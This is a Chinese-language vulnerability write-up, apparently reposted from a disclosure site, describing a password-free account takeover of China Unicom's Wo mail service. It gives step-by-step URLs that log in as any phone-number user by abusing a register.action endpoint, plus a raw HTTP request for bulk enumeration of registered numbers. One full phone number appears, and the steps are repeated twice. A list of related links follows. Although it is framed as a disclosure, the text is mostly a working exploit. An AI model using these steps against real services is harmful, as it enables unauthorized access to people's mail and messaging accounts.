中国联通沃任意邮箱账户登录(免密码永久控制沃通行证可发私信短信) ---管管侠
2015-05-19 10:49
489 查看
复现流程:
1.首先手机号注册过邮箱
2.然后访问如下链接,找个注册过邮箱的手机号
http://mail.wo.cn/mail/register.action?actionType=editUserDetailInfo&user=185********
3.填写别名,只能设置一次,但是一般都不会设置,哈哈
4.确认后就跳转进去了
5.因为没有密码,是通过这个接口生成cookie跳转进来的
下面是达到永久控制的步骤
http://mail.wo.cn/mail/register.action?actionType=editUserDetailInfo&user=18600111138
继续改别名会提示,已经有别名了,无所谓,访问下面链接,其实是已经登录的
http://mail.wo.cn/welcome.action
6.可批量跑注册过邮箱的手机号了
爆破接口
POST /mail/register.action HTTP/1.1
Host: mail.wo.cn
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.10; rv:36.0) Gecko/20100101 Firefox/36.0
Accept: */*
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Referer: http://mail.wo.cn/mail/register.action
Content-Length: 50
Cookie:
Connection: close
Pragma: no-cache
Cache-Control: no-cache
actionType=CheckUser&user=18600141111&domain=wo.cn
返回208是注册过邮箱的
1.首先手机号注册过邮箱
2.然后访问如下链接,找个注册过邮箱的手机号
http://mail.wo.cn/mail/register.action?actionType=editUserDetailInfo&user=185********
3.填写别名,只能设置一次,但是一般都不会设置,哈哈
4.确认后就跳转进去了
5.因为没有密码,是通过这个接口生成cookie跳转进来的
下面是达到永久控制的步骤
http://mail.wo.cn/mail/register.action?actionType=editUserDetailInfo&user=18600111138
继续改别名会提示,已经有别名了,无所谓,访问下面链接,其实是已经登录的
http://mail.wo.cn/welcome.action
漏洞证明:
6.可批量跑注册过邮箱的手机号了爆破接口
POST /mail/register.action HTTP/1.1
Host: mail.wo.cn
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.10; rv:36.0) Gecko/20100101 Firefox/36.0
Accept: */*
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Referer: http://mail.wo.cn/mail/register.action
Content-Length: 50
Cookie:
Connection: close
Pragma: no-cache
Cache-Control: no-cache
actionType=CheckUser&user=18600141111&domain=wo.cn
返回208是注册过邮箱的
相关文章推荐
- 安卓学习之获取QQ登录账户和密码并发送短信
- 物联网系统 : 网页控制远程wifi继电器开关,网页自适应屏幕。 分为登录,注册(短信验证),重置密码(短信验证),控制开关,配置开关(可动态新增或删除开关)
- 你知道没有密码的账户如何登录吗?
- Android——登录界面、SharedPreferences实现记住密码等账户信息
- EBS默认的登录账户和密码
- 简单的流操作实现账户的注册、登录、修改密码
- android用SharedPreferences保存登录账户密码[转]
- oracle 11g密码忘记或过期,登录被拒绝,账户被锁
- 登录验证的js;JS验证邮箱 验证密码
- 局域共享解决——用户账户限制,可能的原因包括不允许空密码,登录时间限制
- htmlunit使用小例子:模拟新浪邮箱登录、修改密码、更改帐号昵称
- mysql安装未设置密码 使用root账户登录报错
- MySQL与安全:ACLs、账户、密码、权限、远程登录
- 使用OWA重置账户密码后,旧密码依然能够登录问题解决 推荐
- CentOS(Linux) VPS 防暴力登录账户和密码
- php永久登录 记住密码
- JS判断邮箱格式,密码输入是否一致,不能为空,长度控制等
- SSH远程管理(用户登录控制及密码验证)
- SpringSecurity3.1.2控制一个账户同时只能登录一次
- 设置activemq登录账户和密码